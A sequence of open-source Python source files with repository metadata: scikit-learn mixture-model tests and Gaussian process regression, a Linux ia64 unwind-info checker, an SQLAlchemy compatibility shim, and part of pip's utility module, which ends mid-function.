bic = (2 * n_samples * SGH * n_dim +
np.log(n_samples) * g._n_parameters())
bound = n_dim * 3. / np.sqrt(n_samples)
assert_true(np.abs(g.aic(X) - aic) / n_samples < bound)
assert_true(np.abs(g.bic(X) - bic) / n_samples < bound)
def check_positive_definite_covars(covariance_type):
r"""Test that covariance matrices do not become non positive definite
Due to the accumulation of round-off errors, the computation of the
covariance matrices during the learning phase could lead to non-positive
definite covariance matrices. Namely the use of the formula:
.. math:: C = (\sum_i w_i x_i x_i^T) - \mu \mu^T
instead of:
.. math:: C = \sum_i w_i (x_i - \mu)(x_i - \mu)^T
while mathematically equivalent, was observed a ``LinAlgError`` exception,
when computing a ``GMM`` with full covariance matrices and fixed mean.
This function ensures that some later optimization will not introduce the
problem again.
"""
rng = np.random.RandomState(1)
    # we build a dataset with two 2-d components. The components are
    # unbalanced (respective weights 0.9 and 0.1)
X = rng.randn(100, 2)
    X[-10:] += (3, 3)  # Shift the last 10 points
gmm = mixture.GMM(2, params="wc", covariance_type=covariance_type,
min_covar=1e-3)
# This is a non-regression test for issue #2640. The following call used
# to trigger:
# numpy.linalg.linalg.LinAlgError: 2-th leading minor not positive definite
gmm.fit(X)
if covariance_type == "diag" or covariance_type == "spherical":
assert_greater(gmm.covars_.min(), 0)
else:
if covariance_type == "tied":
covs = [gmm.covars_]
else:
covs = gmm.covars_
for c in covs:
assert_greater(np.linalg.det(c), 0)
def test_positive_definite_covars():
# Check positive definiteness for all covariance types
for covariance_type in ["full", "tied", "diag", "spherical"]:
yield check_positive_definite_covars, covariance_type
def test_verbose_first_level():
# Create sample data
X = rng.randn(30, 5)
X[:10] += 2
g = mixture.GMM(n_components=2, n_init=2, verbose=1)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
g.fit(X)
finally:
sys.stdout = old_stdout
def test_verbose_second_level():
# Create sample data
X = rng.randn(30, 5)
X[:10] += 2
g = mixture.GMM(n_components=2, n_init=2, verbose=2)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
g.fit(X)
finally:
sys.stdout = old_stdout
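# A brief usage sketch of the GMM estimator these tests exercise (this API
# was deprecated in later scikit-learn releases in favour of GaussianMixture):
if __name__ == '__main__':
    X_demo = np.vstack([rng.randn(100, 2), rng.randn(100, 2) + 5])
    g_demo = mixture.GMM(n_components=2, covariance_type='full', n_iter=10)
    g_demo.fit(X_demo)
    print(g_demo.means_)
    print(g_demo.predict(X_demo[:5]))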
|
bsd-3-clause
|
eva-oss/linux
|
arch/ia64/scripts/unwcheck.py
|
13143
|
1714
|
#!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
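# Note: the script above targets Python 2 (print statements, ``long``, the
# ``0L`` literal). A rough sketch of the corresponding Python 3 changes:
#
#     print("Usage: %s FILE" % sys.argv[0])    # print() is a function
#     start = int(m.group(2), 16)              # long -> int
#     rlen_sum = 0                             # 0L -> 0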
|
gpl-2.0
|
ioram7/keystone-federado-pgid2013
|
build/sqlalchemy/build/lib.linux-x86_64-2.7/sqlalchemy/databases/__init__.py
|
35
|
1160
|
# databases/__init__.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Include imports from the sqlalchemy.dialects package for backwards
compatibility with pre 0.6 versions.
"""
from sqlalchemy.dialects.sqlite import base as sqlite
from sqlalchemy.dialects.postgresql import base as postgresql
postgres = postgresql
from sqlalchemy.dialects.mysql import base as mysql
from sqlalchemy.dialects.drizzle import base as drizzle
from sqlalchemy.dialects.oracle import base as oracle
from sqlalchemy.dialects.firebird import base as firebird
from sqlalchemy.dialects.maxdb import base as maxdb
from sqlalchemy.dialects.informix import base as informix
from sqlalchemy.dialects.mssql import base as mssql
from sqlalchemy.dialects.access import base as access
from sqlalchemy.dialects.sybase import base as sybase
__all__ = (
'access',
'drizzle',
'firebird',
'informix',
'maxdb',
'mssql',
'mysql',
'postgresql',
'sqlite',
'oracle',
'sybase',
)
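# A small usage sketch: both import paths below resolve to the same module
# object, which is the point of this backwards-compatibility shim.
if __name__ == '__main__':
    from sqlalchemy.databases import postgresql as old_style
    from sqlalchemy.dialects.postgresql import base as new_style
    assert old_style is new_style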
|
apache-2.0
|
PatrickOReilly/scikit-learn
|
sklearn/gaussian_process/gpr.py
|
7
|
18711
|
"""Gaussian processes regression. """
# Authors: Jan Hendrik Metzen <[email protected]>
#
# License: BSD 3 clause
import warnings
from operator import itemgetter
import numpy as np
from scipy.linalg import cholesky, cho_solve, solve_triangular
from scipy.optimize import fmin_l_bfgs_b
from sklearn.base import BaseEstimator, RegressorMixin, clone
from sklearn.gaussian_process.kernels import RBF, ConstantKernel as C
from sklearn.utils import check_random_state
from sklearn.utils.validation import check_X_y, check_array
class GaussianProcessRegressor(BaseEstimator, RegressorMixin):
"""Gaussian process regression (GPR).
The implementation is based on Algorithm 2.1 of Gaussian Processes
for Machine Learning (GPML) by Rasmussen and Williams.
In addition to standard scikit-learn estimator API,
GaussianProcessRegressor:
* allows prediction without prior fitting (based on the GP prior)
* provides an additional method sample_y(X), which evaluates samples
drawn from the GPR (prior or posterior) at given inputs
* exposes a method log_marginal_likelihood(theta), which can be used
externally for other ways of selecting hyperparameters, e.g., via
Markov chain Monte Carlo.
Read more in the :ref:`User Guide <gaussian_process>`.
Parameters
----------
kernel : kernel object
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
alpha : float or array-like, optional (default: 1e-10)
Value added to the diagonal of the kernel matrix during fitting.
Larger values correspond to increased noise level in the observations
and reduce potential numerical issue during fitting. If an array is
passed, it must have the same number of entries as the data used for
fitting and is used as datapoint-dependent noise level. Note that this
        is equivalent to adding a WhiteKernel with c=alpha. The ability to
        specify the noise level directly as a parameter is provided mainly for
        convenience and for consistency with Ridge.
optimizer : string or callable, optional (default: "fmin_l_bfgs_b")
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'fmin_l_bfgs_b' algorithm from scipy.optimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer: int, optional (default: 0)
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer == 0 implies that one
run is performed.
normalize_y: boolean, optional (default: False)
        Whether the target values y are normalized, i.e., the mean of the
        observed target values becomes zero. This parameter should be set to
        True if the target values' mean is expected to differ considerably from
zero. When enabled, the normalization effectively modifies the GP's
prior based on the data, which contradicts the likelihood principle;
normalization is thus disabled per default.
copy_X_train : bool, optional (default: True)
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : integer or numpy.RandomState, optional
The generator used to initialize the centers. If an integer is
given, it fixes the seed. Defaults to the global numpy random
number generator.
Attributes
----------
X_train_ : array-like, shape = (n_samples, n_features)
Feature values in training data (also required for prediction)
y_train_: array-like, shape = (n_samples, [n_output_dims])
Target values in training data (also required for prediction)
kernel_: kernel object
The kernel used for prediction. The structure of the kernel is the
same as the one passed as parameter but with optimized hyperparameters
L_: array-like, shape = (n_samples, n_samples)
Lower-triangular Cholesky decomposition of the kernel in ``X_train_``
alpha_: array-like, shape = (n_samples,)
Dual coefficients of training data points in kernel space
log_marginal_likelihood_value_: float
The log-marginal-likelihood of ``self.kernel_.theta``
"""
def __init__(self, kernel=None, alpha=1e-10,
optimizer="fmin_l_bfgs_b", n_restarts_optimizer=0,
normalize_y=False, copy_X_train=True, random_state=None):
self.kernel = kernel
self.alpha = alpha
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.normalize_y = normalize_y
self.copy_X_train = copy_X_train
self.random_state = random_state
def fit(self, X, y):
"""Fit Gaussian process regression model
Parameters
----------
X : array-like, shape = (n_samples, n_features)
Training data
y : array-like, shape = (n_samples, [n_output_dims])
Target values
Returns
-------
self : returns an instance of self.
"""
if self.kernel is None: # Use an RBF kernel as default
self.kernel_ = C(1.0, constant_value_bounds="fixed") \
* RBF(1.0, length_scale_bounds="fixed")
else:
self.kernel_ = clone(self.kernel)
self.rng = check_random_state(self.random_state)
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
# Normalize target value
if self.normalize_y:
self.y_train_mean = np.mean(y, axis=0)
# demean y
y = y - self.y_train_mean
else:
self.y_train_mean = np.zeros(1)
if np.iterable(self.alpha) \
and self.alpha.shape[0] != y.shape[0]:
if self.alpha.shape[0] == 1:
self.alpha = self.alpha[0]
else:
raise ValueError("alpha must be a scalar or an array"
" with same number of entries as y.(%d != %d)"
% (self.alpha.shape[0], y.shape[0]))
self.X_train_ = np.copy(X) if self.copy_X_train else X
self.y_train_ = np.copy(y) if self.copy_X_train else y
if self.optimizer is not None and self.kernel_.n_dims > 0:
# Choose hyperparameters based on maximizing the log-marginal
# likelihood (potentially starting from several initial values)
def obj_func(theta, eval_gradient=True):
if eval_gradient:
lml, grad = self.log_marginal_likelihood(
theta, eval_gradient=True)
return -lml, -grad
else:
return -self.log_marginal_likelihood(theta)
# First optimize starting from theta specified in kernel
optima = [(self._constrained_optimization(obj_func,
self.kernel_.theta,
self.kernel_.bounds))]
# Additional runs are performed from log-uniform chosen initial
# theta
if self.n_restarts_optimizer > 0:
if not np.isfinite(self.kernel_.bounds).all():
raise ValueError(
"Multiple optimizer restarts (n_restarts_optimizer>0) "
"requires that all bounds are finite.")
bounds = self.kernel_.bounds
for iteration in range(self.n_restarts_optimizer):
theta_initial = \
self.rng.uniform(bounds[:, 0], bounds[:, 1])
optima.append(
self._constrained_optimization(obj_func, theta_initial,
bounds))
# Select result from run with minimal (negative) log-marginal
# likelihood
lml_values = list(map(itemgetter(1), optima))
self.kernel_.theta = optima[np.argmin(lml_values)][0]
self.log_marginal_likelihood_value_ = -np.min(lml_values)
else:
self.log_marginal_likelihood_value_ = \
self.log_marginal_likelihood(self.kernel_.theta)
# Precompute quantities required for predictions which are independent
# of actual query points
K = self.kernel_(self.X_train_)
K[np.diag_indices_from(K)] += self.alpha
self.L_ = cholesky(K, lower=True) # Line 2
self.alpha_ = cho_solve((self.L_, True), self.y_train_) # Line 3
return self
def predict(self, X, return_std=False, return_cov=False):
"""Predict using the Gaussian process regression model
We can also predict based on an unfitted model by using the GP prior.
        In addition to the mean of the predictive distribution, its standard
        deviation (return_std=True) or covariance (return_cov=True) can also
        be returned. Note that at most one of the two can be requested.
Parameters
----------
X : array-like, shape = (n_samples, n_features)
Query points where the GP is evaluated
return_std : bool, default: False
If True, the standard-deviation of the predictive distribution at
the query points is returned along with the mean.
return_cov : bool, default: False
If True, the covariance of the joint predictive distribution at
the query points is returned along with the mean
Returns
-------
y_mean : array, shape = (n_samples, [n_output_dims])
            Mean of predictive distribution at query points
y_std : array, shape = (n_samples,), optional
Standard deviation of predictive distribution at query points.
Only returned when return_std is True.
y_cov : array, shape = (n_samples, n_samples), optional
            Covariance of joint predictive distribution at query points.
Only returned when return_cov is True.
"""
if return_std and return_cov:
raise RuntimeError(
"Not returning standard deviation of predictions when "
"returning full covariance.")
X = check_array(X)
        if not hasattr(self, "X_train_"):  # Unfitted; predict based on GP prior
y_mean = np.zeros(X.shape[0])
if return_cov:
y_cov = self.kernel(X)
return y_mean, y_cov
elif return_std:
y_var = self.kernel.diag(X)
return y_mean, np.sqrt(y_var)
else:
return y_mean
else: # Predict based on GP posterior
K_trans = self.kernel_(X, self.X_train_)
y_mean = K_trans.dot(self.alpha_) # Line 4 (y_mean = f_star)
            y_mean = self.y_train_mean + y_mean  # undo normalization
if return_cov:
v = cho_solve((self.L_, True), K_trans.T) # Line 5
y_cov = self.kernel_(X) - K_trans.dot(v) # Line 6
return y_mean, y_cov
elif return_std:
# compute inverse K_inv of K based on its Cholesky
# decomposition L and its inverse L_inv
L_inv = solve_triangular(self.L_.T, np.eye(self.L_.shape[0]))
K_inv = L_inv.dot(L_inv.T)
# Compute variance of predictive distribution
y_var = self.kernel_.diag(X)
y_var -= np.einsum("ki,kj,ij->k", K_trans, K_trans, K_inv)
# Check if any of the variances is negative because of
# numerical issues. If yes: set the variance to 0.
y_var_negative = y_var < 0
if np.any(y_var_negative):
warnings.warn("Predicted variances smaller than 0. "
"Setting those variances to 0.")
y_var[y_var_negative] = 0.0
return y_mean, np.sqrt(y_var)
else:
return y_mean
def sample_y(self, X, n_samples=1, random_state=0):
"""Draw samples from Gaussian process and evaluate at X.
Parameters
----------
X : array-like, shape = (n_samples_X, n_features)
Query points where the GP samples are evaluated
n_samples : int, default: 1
The number of samples drawn from the Gaussian process
random_state: RandomState or an int seed (0 by default)
A random number generator instance
Returns
-------
y_samples : array, shape = (n_samples_X, [n_output_dims], n_samples)
Values of n_samples samples drawn from Gaussian process and
evaluated at query points.
"""
rng = check_random_state(random_state)
y_mean, y_cov = self.predict(X, return_cov=True)
if y_mean.ndim == 1:
y_samples = rng.multivariate_normal(y_mean, y_cov, n_samples).T
else:
y_samples = \
[rng.multivariate_normal(y_mean[:, i], y_cov,
n_samples).T[:, np.newaxis]
for i in range(y_mean.shape[1])]
y_samples = np.hstack(y_samples)
return y_samples
def log_marginal_likelihood(self, theta=None, eval_gradient=False):
"""Returns log-marginal likelihood of theta for training data.
Parameters
----------
theta : array-like, shape = (n_kernel_params,) or None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default: False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. If True, theta must not be None.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : array, shape = (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when eval_gradient is True.
"""
if theta is None:
if eval_gradient:
raise ValueError(
"Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
kernel = self.kernel_.clone_with_theta(theta)
if eval_gradient:
K, K_gradient = kernel(self.X_train_, eval_gradient=True)
else:
K = kernel(self.X_train_)
K[np.diag_indices_from(K)] += self.alpha
try:
L = cholesky(K, lower=True) # Line 2
except np.linalg.LinAlgError:
return (-np.inf, np.zeros_like(theta)) \
if eval_gradient else -np.inf
# Support multi-dimensional output of self.y_train_
y_train = self.y_train_
if y_train.ndim == 1:
y_train = y_train[:, np.newaxis]
alpha = cho_solve((L, True), y_train) # Line 3
# Compute log-likelihood (compare line 7)
log_likelihood_dims = -0.5 * np.einsum("ik,ik->k", y_train, alpha)
log_likelihood_dims -= np.log(np.diag(L)).sum()
log_likelihood_dims -= K.shape[0] / 2 * np.log(2 * np.pi)
log_likelihood = log_likelihood_dims.sum(-1) # sum over dimensions
if eval_gradient: # compare Equation 5.9 from GPML
tmp = np.einsum("ik,jk->ijk", alpha, alpha) # k: output-dimension
tmp -= cho_solve((L, True), np.eye(K.shape[0]))[:, :, np.newaxis]
# Compute "0.5 * trace(tmp.dot(K_gradient))" without
# constructing the full matrix tmp.dot(K_gradient) since only
# its diagonal is required
log_likelihood_gradient_dims = \
0.5 * np.einsum("ijl,ijk->kl", tmp, K_gradient)
log_likelihood_gradient = log_likelihood_gradient_dims.sum(-1)
if eval_gradient:
return log_likelihood, log_likelihood_gradient
else:
return log_likelihood
def _constrained_optimization(self, obj_func, initial_theta, bounds):
if self.optimizer == "fmin_l_bfgs_b":
theta_opt, func_min, convergence_dict = \
fmin_l_bfgs_b(obj_func, initial_theta, bounds=bounds)
if convergence_dict["warnflag"] != 0:
                warnings.warn("fmin_l_bfgs_b terminated abnormally with the "
                              "state: %s" % convergence_dict)
elif callable(self.optimizer):
theta_opt, func_min = \
self.optimizer(obj_func, initial_theta, bounds=bounds)
else:
raise ValueError("Unknown optimizer %s." % self.optimizer)
return theta_opt, func_min
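# A usage sketch of the estimator defined above, on toy 1-d data:
if __name__ == '__main__':
    X_demo = np.linspace(0, 10, 20)[:, np.newaxis]
    y_demo = np.sin(X_demo).ravel()
    demo_kernel = C(1.0) * RBF(length_scale=1.0)
    gpr = GaussianProcessRegressor(kernel=demo_kernel, alpha=1e-6)
    gpr.fit(X_demo, y_demo)
    y_mean, y_std = gpr.predict(X_demo, return_std=True)
    print(y_mean[:3], y_std[:3])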
|
bsd-3-clause
|
dadiletta/Saber
|
venv/lib/python3.4/site-packages/pip/util.py
|
343
|
24172
|
import sys
import shutil
import os
import stat
import re
import posixpath
import zipfile
import tarfile
import subprocess
import textwrap
from pip.exceptions import InstallationError, BadCommand, PipError
from pip.backwardcompat import (WindowsError, string_types, raw_input,
                                console_to_str, user_site, PermissionError)
from pip.locations import site_packages, running_under_virtualenv, virtualenv_no_global
from pip.log import logger
from pip._vendor import pkg_resources
from pip._vendor.distlib import version
__all__ = ['rmtree', 'display_path', 'backup_dir',
'find_command', 'ask', 'Inf',
'normalize_name', 'splitext',
'format_size', 'is_installable_dir',
'is_svn_page', 'file_contents',
'split_leading_dir', 'has_leading_dir',
'make_path_relative', 'normalize_path',
'renames', 'get_terminal_size', 'get_prog',
'unzip_file', 'untar_file', 'create_download_cache_folder',
'cache_download', 'unpack_file', 'call_subprocess']
def get_prog():
try:
if os.path.basename(sys.argv[0]) in ('__main__.py', '-c'):
return "%s -m pip" % sys.executable
except (AttributeError, TypeError, IndexError):
pass
return 'pip'
def rmtree(dir, ignore_errors=False):
shutil.rmtree(dir, ignore_errors=ignore_errors,
onerror=rmtree_errorhandler)
def rmtree_errorhandler(func, path, exc_info):
"""On Windows, the files in .svn are read-only, so when rmtree() tries to
remove them, an exception is thrown. We catch that here, remove the
read-only attribute, and hopefully continue without problems."""
exctype, value = exc_info[:2]
if not ((exctype is WindowsError and value.args[0] == 5) or #others
(exctype is OSError and value.args[0] == 13) or #python2.4
(exctype is PermissionError and value.args[3] == 5) #python3.3
):
raise
# file type should currently be read only
if ((os.stat(path).st_mode & stat.S_IREAD) != stat.S_IREAD):
raise
# convert to read/write
os.chmod(path, stat.S_IWRITE)
# use the original function to repeat the operation
func(path)
def display_path(path):
"""Gives the display value for a given path, making it relative to cwd
if possible."""
path = os.path.normcase(os.path.abspath(path))
if path.startswith(os.getcwd() + os.path.sep):
path = '.' + path[len(os.getcwd()):]
return path
def backup_dir(dir, ext='.bak'):
"""Figure out the name of a directory to back up the given dir to
(adding .bak, .bak2, etc)"""
n = 1
extension = ext
while os.path.exists(dir + extension):
n += 1
extension = ext + str(n)
return dir + extension
def find_command(cmd, paths=None, pathext=None):
"""Searches the PATH for the given command and returns its path"""
if paths is None:
paths = os.environ.get('PATH', '').split(os.pathsep)
if isinstance(paths, string_types):
paths = [paths]
# check if there are funny path extensions for executables, e.g. Windows
if pathext is None:
pathext = get_pathext()
pathext = [ext for ext in pathext.lower().split(os.pathsep) if len(ext)]
# don't use extensions if the command ends with one of them
if os.path.splitext(cmd)[1].lower() in pathext:
pathext = ['']
# check if we find the command on PATH
for path in paths:
# try without extension first
cmd_path = os.path.join(path, cmd)
for ext in pathext:
# then including the extension
cmd_path_ext = cmd_path + ext
if os.path.isfile(cmd_path_ext):
return cmd_path_ext
if os.path.isfile(cmd_path):
return cmd_path
raise BadCommand('Cannot find command %r' % cmd)
def get_pathext(default_pathext=None):
"""Returns the path extensions from environment or a default"""
if default_pathext is None:
default_pathext = os.pathsep.join(['.COM', '.EXE', '.BAT', '.CMD'])
pathext = os.environ.get('PATHEXT', default_pathext)
return pathext
def ask_path_exists(message, options):
for action in os.environ.get('PIP_EXISTS_ACTION', '').split():
if action in options:
return action
return ask(message, options)
def ask(message, options):
"""Ask the message interactively, with the given possible responses"""
while 1:
if os.environ.get('PIP_NO_INPUT'):
raise Exception('No input was expected ($PIP_NO_INPUT set); question: %s' % message)
response = raw_input(message)
response = response.strip().lower()
if response not in options:
print('Your response (%r) was not one of the expected responses: %s' % (
response, ', '.join(options)))
else:
return response
class _Inf(object):
"""I am bigger than everything!"""
def __eq__(self, other):
if self is other:
return True
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __gt__(self, other):
return True
def __ge__(self, other):
return True
def __repr__(self):
return 'Inf'
Inf = _Inf()  # this object is not currently used as a sortable in our code
del _Inf
_normalize_re = re.compile(r'[^a-z]', re.I)
def normalize_name(name):
return _normalize_re.sub('-', name.lower())
def format_size(bytes):
if bytes > 1000*1000:
return '%.1fMB' % (bytes/1000.0/1000)
elif bytes > 10*1000:
return '%ikB' % (bytes/1000)
elif bytes > 1000:
return '%.1fkB' % (bytes/1000.0)
else:
return '%ibytes' % bytes
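# Examples: format_size(2500000) -> '2.5MB'; format_size(20000) -> '20kB';
# format_size(1500) -> '1.5kB'; format_size(999) -> '999bytes'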
def is_installable_dir(path):
"""Return True if `path` is a directory containing a setup.py file."""
if not os.path.isdir(path):
return False
setup_py = os.path.join(path, 'setup.py')
if os.path.isfile(setup_py):
return True
return False
def is_svn_page(html):
"""Returns true if the page appears to be the index page of an svn repository"""
return (re.search(r'<title>[^<]*Revision \d+:', html)
and re.search(r'Powered by (?:<a[^>]*?>)?Subversion', html, re.I))
def file_contents(filename):
fp = open(filename, 'rb')
try:
return fp.read().decode('utf-8')
finally:
fp.close()
def split_leading_dir(path):
path = str(path)
path = path.lstrip('/').lstrip('\\')
if '/' in path and (('\\' in path and path.find('/') < path.find('\\'))
or '\\' not in path):
return path.split('/', 1)
elif '\\' in path:
return path.split('\\', 1)
else:
return path, ''
def has_leading_dir(paths):
"""Returns true if all the paths have the same leading path name
(i.e., everything is in one subdirectory in an archive)"""
common_prefix = None
for path in paths:
prefix, rest = split_leading_dir(path)
if not prefix:
return False
elif common_prefix is None:
common_prefix = prefix
elif prefix != common_prefix:
return False
return True
def make_path_relative(path, rel_to):
"""
    Make a filename relative, given the filename path and the directory it
    should be made relative to (rel_to).
    >>> make_path_relative('/usr/share/something/a-file.pth',
    ...                    '/usr/share/another-place/src/Directory')
    '../../../something/a-file.pth'
    >>> make_path_relative('/usr/share/something/a-file.pth',
    ...                    '/home/user/src/Directory')
    '../../../usr/share/something/a-file.pth'
    >>> make_path_relative('/usr/share/a-file.pth', '/usr/share/')
    'a-file.pth'
"""
path_filename = os.path.basename(path)
path = os.path.dirname(path)
path = os.path.normpath(os.path.abspath(path))
rel_to = os.path.normpath(os.path.abspath(rel_to))
path_parts = path.strip(os.path.sep).split(os.path.sep)
rel_to_parts = rel_to.strip(os.path.sep).split(os.path.sep)
while path_parts and rel_to_parts and path_parts[0] == rel_to_parts[0]:
path_parts.pop(0)
rel_to_parts.pop(0)
full_parts = ['..']*len(rel_to_parts) + path_parts + [path_filename]
if full_parts == ['']:
return '.' + os.path.sep
return os.path.sep.join(full_parts)
def normalize_path(path):
"""
Convert a path to its canonical, case-normalized, absolute version.
"""
return os.path.normcase(os.path.realpath(os.path.expanduser(path)))
def splitext(path):
"""Like os.path.splitext, but take off .tar too"""
base, ext = posixpath.splitext(path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
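# Quick illustration of the '.tar' special-casing above:
#   splitext('archive.tar.gz') -> ('archive', '.tar.gz')
#   splitext('archive.zip')    -> ('archive', '.zip')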
def renames(old, new):
"""Like os.renames(), but handles renaming across devices."""
# Implementation borrowed from os.renames().
head, tail = os.path.split(new)
if head and tail and not os.path.exists(head):
os.makedirs(head)
shutil.move(old, new)
head, tail = os.path.split(old)
if head and tail:
try:
os.removedirs(head)
except OSError:
pass
def is_local(path):
"""
Return True if path is within sys.prefix, if we're running in a virtualenv.
If we're not in a virtualenv, all paths are considered "local."
"""
if not running_under_virtualenv():
return True
return normalize_path(path).startswith(normalize_path(sys.prefix))
def dist_is_local(dist):
"""
Return True if given Distribution object is installed locally
(i.e. within current virtualenv).
Always True if we're not in a virtualenv.
"""
return is_local(dist_location(dist))
def dist_in_usersite(dist):
"""
Return True if given Distribution is installed in user site.
"""
if user_site:
return normalize_path(dist_location(dist)).startswith(normalize_path(user_site))
else:
return False
def dist_in_site_packages(dist):
"""
Return True if given Distribution is installed in distutils.sysconfig.get_python_lib().
"""
return normalize_path(dist_location(dist)).startswith(normalize_path(site_packages))
def dist_is_editable(dist):
"""Is distribution an editable install?"""
#TODO: factor out determining editableness out of FrozenRequirement
from pip import FrozenRequirement
req = FrozenRequirement.from_dist(dist, [])
return req.editable
def get_installed_distributions(local_only=True,
skip=('setuptools', 'pip', 'python', 'distribute'),
include_editables=True,
editables_only=False):
"""
Return a list of installed Distribution objects.
If ``local_only`` is True (default), only return installations
local to the current virtualenv, if in a virtualenv.
``skip`` argument is an iterable of lower-case project names to
ignore; defaults to ('setuptools', 'pip', 'python', 'distribute'). [FIXME also
skip virtualenv?]
If ``include_editables`` is False, don't report editables.
If ``editables_only`` is True, only report editables.
"""
if local_only:
local_test = dist_is_local
else:
local_test = lambda d: True
if include_editables:
editable_test = lambda d: True
else:
editable_test = lambda d: not dist_is_editable(d)
if editables_only:
editables_only_test = lambda d: dist_is_editable(d)
else:
editables_only_test = lambda d: True
return [d for d in pkg_resources.working_set
if local_test(d)
and d.key not in skip
and editable_test(d)
and editables_only_test(d)
]
def egg_link_path(dist):
"""
Return the path for the .egg-link file if it exists, otherwise, None.
There are 3 scenarios:
1) not in a virtualenv
try to find in site.USER_SITE, then site_packages
2) in a no-global virtualenv
try to find in site_packages
3) in a yes-global virtualenv
try to find in site_packages, then site.USER_SITE (don't look in global location)
For #1 and #3, there could be odd cases, where there's an egg-link in 2 locations.
This method will just return the first one found.
"""
sites = []
if running_under_virtualenv():
if virtualenv_no_global():
sites.append(site_packages)
else:
sites.append(site_packages)
if user_site:
sites.append(user_site)
else:
if user_site:
sites.append(user_site)
sites.append(site_packages)
for site in sites:
egglink = os.path.join(site, dist.project_name) + '.egg-link'
if os.path.isfile(egglink):
return egglink
def dist_location(dist):
"""
Get the site-packages location of this distribution. Generally
this is dist.location, except in the case of develop-installed
packages, where dist.location is the source code location, and we
want to know where the egg-link file is.
"""
egg_link = egg_link_path(dist)
if egg_link:
return egg_link
return dist.location
def get_terminal_size():
"""Returns a tuple (x, y) representing the width(x) and the height(x)
in characters of the terminal window."""
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
import struct
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
'1234'))
except:
return None
if cr == (0, 0):
return None
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (os.environ.get('LINES', 25), os.environ.get('COLUMNS', 80))
return int(cr[1]), int(cr[0])
def current_umask():
"""Get the current umask which involves having to set it temporarily."""
mask = os.umask(0)
os.umask(mask)
return mask
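# Example of the permission arithmetic used by the unpack helpers below,
# assuming a typical umask of 0o022:
#   (0o777 - 0o022) | 0o111 == 0o755   # rwxr-xr-x for executable members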
def unzip_file(filename, location, flatten=True):
"""
Unzip the file (with path `filename`) to the destination `location`. All
files are written based on system defaults and umask (i.e. permissions are
not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
if not os.path.exists(location):
os.makedirs(location)
zipfp = open(filename, 'rb')
try:
zip = zipfile.ZipFile(zipfp)
leading = has_leading_dir(zip.namelist()) and flatten
for info in zip.infolist():
name = info.filename
data = zip.read(name)
fn = name
if leading:
fn = split_leading_dir(name)[1]
fn = os.path.join(location, fn)
dir = os.path.dirname(fn)
if not os.path.exists(dir):
os.makedirs(dir)
